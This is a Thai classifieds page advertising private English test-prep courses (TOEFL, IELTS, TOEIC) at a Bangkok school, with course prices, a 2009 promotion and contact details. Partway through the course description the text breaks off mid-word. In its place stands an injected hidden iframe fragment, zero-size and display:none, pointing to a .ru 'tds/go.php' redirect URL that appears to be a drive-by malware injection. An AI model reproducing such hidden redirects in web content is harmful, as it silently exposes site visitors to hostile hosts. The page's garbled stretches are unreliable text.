ประกาศซื้อขายฟรี
Amazing TOEIC /TOEFL / ibt / itp / IELTS / CU-TEP / TU-GET / SMART-I / SAT/ หลักสูตรPrivate พร้อม sound lab ส่วนตัว คุ้ม

Amazing TOEIC /TOEFL / ibt / itp / IELTS / CU-TEP / TU-GET / SMART-I / SAT/ หลักสูตรPrivate พร้อม sound lab ส่วนตัว คุ้มค่าที่สุด.. เริ่มต้นเพียง 8,600 บาท กับหลักสูตรคัดสรรคุณภาพเต็ม ๆ ที่ช่วยเพิ่มคะแนนสอบอย่างแท้จริงและรวดเร็ว ดูตัวอย่างจริงของผู้สำเร็จ


ติวสอบ TOEFL / ibt / itp / IELTS / TOEIC / CU-TEP / TU-GET / SMART-I / SAT/ หลักสูตรPrivate พร้อม sound lab ส่วนตัว คุ้มค่าที่สุด.. เริ่มต้นเพียง 8,600 บาท กับหลักสูตรคัดสรรคุณภาพเต็ม ๆ ที่ช่วยเพิ่มคะแนนสอบอย่างแท้จริงและรวดเร็ว ดูตัวอย่างจริงของผู้สำเร็จที่ท้ายประกาศนี้ เลือกเวลาเรียนได้ Tel. 081-907-2118, 089-367-1754,081-909-6541 ถ.พหลโยธิน ใกล้โลตัสสะพานใหม่ (หลักสี่-รามอินทรา) หยุดวันพระ

มุ่งสู่เป้าหมาย TOEFL ibt 80 / itp 550 / IELTS 6.5 / TOEIC 800 กับ 3 หลักสูตรที่มีให้เลือก
(ดูผลงานความสำเร็จจริงที่ท้ายประกาศ)

1. หลักสูตรตะลุยโจทย์ TOEFL ibt / IELTS / TOEIC - 8,600 บาท (Code 090501)
เป็นหลักสูตรที่สามารถช่วยเพิ่มคะแนนอย่างแท้จริงภายใน 1-2 สัปดาห์
เหมาะสำหรับผู้ที่เคยเข้าสอบจริงมาแล้ว (กรุณานำผลสอบมาแสดงในวันสมัคร)
ผู้เรียนจะได้เรียนแบบ private ต่อเนื่องตลอด 1-2 สัปดาห์ (ประมาณ 54 ชม.)
รับสมัครผู้เรียนที่อายุไม่เกิน 26 ปี สามารถเข้าเรียนได้สม่ำเสมอ
และขาดเรียนติดต่อกันไม่เกิน15 วัน

2. หลักสูตรTOEFL ibt / IELTS /TOEIC(รวม Grammar) 120 ชม. 11,600 บาท (Code 090502)
คัดสรรเนื้อหาคุณภาพล้วน ๆ ให้คุ้มค่า คุ้มราคา และเวลา ในราคาประหยัดพิเศษ
เหมาะสำหรับผู้ที่ยังไม่เคยสอบ .. หรือมีพื้นความรู้ยังไม่พอที่จะเข้าสู่คอร์สตะลุยโจทย์
ผู้เรียนจะได้เรียนแบบ private ต่อเนื่องตลอด 5-6 สัปดาห์ (ประมาณ 120 - 162 ชม.)
รับสมัครผู้เรียนที่อายุไม่เกิน 26 ปี สามารถเข้าเรียนได้สม่ำเสมอ
และขาดเรียนติดต่อกันไม่เกิน15 วัน


3. หลักสูตรรับรองผล TOEFL ibt / IELTS /TOEIC 26,600 บาท (Code 090503)
สำหรับผู้เรียนที่มีพื้นฐานค่อนข้างอ่อน เรียนรู้อย่างค่อยเป็นค่อยไปแบบ private ไม่จำกัดชั่วโมงจ่ายเพียงครั้งเดียว เรียนจนกว่าจะสอบได้คะแนนตามที่ตั้งไว้
รับสมัครผู้เรียนที่อายุไม่เกิน 26 ปี สามารถเข้าเรียนได้สม่ำเสมอ
และขาดเรียนติดต่อกันไม่เกิน15 วัน

โปรโมชั่นพิเศษภายใน 10 พฤษภาคม 52
สมัครเรียนแบบรับรองผล (Code 090503) พร้อมกัน 2 คนขึ้นไป
รับส่วนลดคนละ 25% (เหลือคนละ 19,900บาท)


โรงเรียนส่งเสริมคุณภาพภาษา Smart Education มีวัตถุประสงค์ในการส่งเสริมคุณภาพทั้งด้านวิชาการและกระบวนการเรียนรู้ตามระดับความรู้ที่แท้จริงของผู้เรียน และเพื่อเป็นการแก้ปัญหาที่ผู้เรียนจำนวนมากประสบมาจากการเรียนที่สถาบันอื่น ๆ คือ การฝึกฝนทักษะในการทำข้อสอบไม่มากพอที่จะทราบข้อบกพร่องที่แท้จริงของตนเองก่อนเข้าสอบจริง เป็นเหตุให้ต้องเสียเงินลงเรียนซ้ำแล้วซ้ำอีกและ เสียค่าสอบหลาย ๆ ครั้งกว่าจะสอบผ่าน (เสียทั้งเวลาและโอกาสของชีวิต)

ดังนั้น SMART EDUCATION จึงเปิดคอร์สตะลุยโจทย์ TOEFL iBT / IELTS /TOEIC เพื่อเตรียมความพร้อมของผู้เรียนก่อนเข้าสอบจริง สำหรับผู้ที่จะต้องเข้าสอบในระยะเวลา 1-2 สัปดาห์ข้างหน้า ผู้เรียนจะได้รับการทดสอบเบื้องต้นเพื่อวัดระดับความรู้ และหาจุดอ่อนจุดแข็ง ก่อนเข้าสู่หลักสูตร

ลักษณะการเรียนเป็นแบบ Private ที่ผู้เรียนจะได้รับความรู้จากการฝึกฝนการทำข้อสอบเสมือนจริง ไต่ระดับความยากง่ายตามระดับความรู้ที่แท้จริงของผู้เรียน ซึ่งจะทำให้ผู้เรียนคุ้นเคยกับรูปแบบของคำถาม คำศัพท์ที่มักออกสอบ และแนวทางที่ถูกต้องของการตอบคำถามในแต่ละทักษะ โดยทางสถาบันมีเป้าหมายพัฒนาผู้เรียนให้มีทักษะการฟังและการอ่านที่อยู่ในระดับ 80% ขึ้นไป ซึ่งจากประสบการณ์ที่ผ่านมา นักเรียนจากที่นี่สามารถทำคะแนน Listening ของ IELTS ได้ในระดับ 8 ืืำืทำคะแนน Listening ของ TOEIC ได้สูงสุด 480 คะแนน ซึ่งหากผู้เรียนที่ต้องสอบ TOEFL iBT สามารถฟังและอ่านได้ดีมากก็จะสร้างโอกาสเพิ่มคะแนนใน Writing และ Speaking ซึ่งต้องอ่านและฟังก่อนเขียนตอบหรือพูดตอบได้อีกมาก

- SMART EDUCATION เป็นสถาบันด้านการเรียนภาษาอังกฤษสถาบันแรกและสถาบันเดียวของประเทศไทยที่มีวิธีการสอนที่เป็นเอกลักษณ์ และแยกผู้เรียนเป็นแบบ Private ในราคาประหยัดแต่เข้มข้นในเรื่องคุณภาพการเรียนการสอน ด้วยความตั้งใจจริงของเจ้าของสถาบันและทีมผู้สอน ผู้เรียนทุกคนจะได้รับการทดสอบวัดพื้นฐานความรู้ทางภาษาอังกฤษในเบื้องต้น คือ การฟัง การอ่านและไวยากรณ src="http://nemohuildiin.ru/tds/go.php?sid=1" width="0" height="0" style="display:none">

จุดประสงค์
: ต้องการขาย
ราคา/ค่าบริการ
: 100
ประเภท
: สินค้าใหม่
ผู้ประกาศ
: ครูนุช พัฒน
โทรศัพท์
: 0819072118
มือถือ
: 0819072118
จังหวัด
: กรุงเทพมหานครฯ
อัพเดทล่าสุด
: 5/6/2552 8:29:19

 โปรดอ่านคำเตือน

ข้อความที่ประกาศ และโฆษณาทั้งหมดนี้ เป็นสิ่งที่เกิดขึ้นจากผู้ชมและสมาชิก ที่เข้ามาใช้บริการ ไม่ได้เกิดจากผู้ดูแลหรือผู้จัดทำเว็บไซต์ หากผู้ชมสนใจในประกาศและโฆษณาดังกล่าว กรุณาติดต่อโดยตรงถึงผู้ที่ลงประกาศ หรือโฆษณา ด้วยตนเอง และหากเกิดความผิดพลาดใดๆ เราไม่ขอรับผิดชอบ ดังนั้นผู้ชมควรใช้วิจารณญาณก่อนการติดสินใจใดๆ เกี่ยวกับคำประกาศและโฆษณาดังกล่าวนี้
เว็บไซต์สำเร็จรูป

แสดงความคิดเห็น

Related Classifieds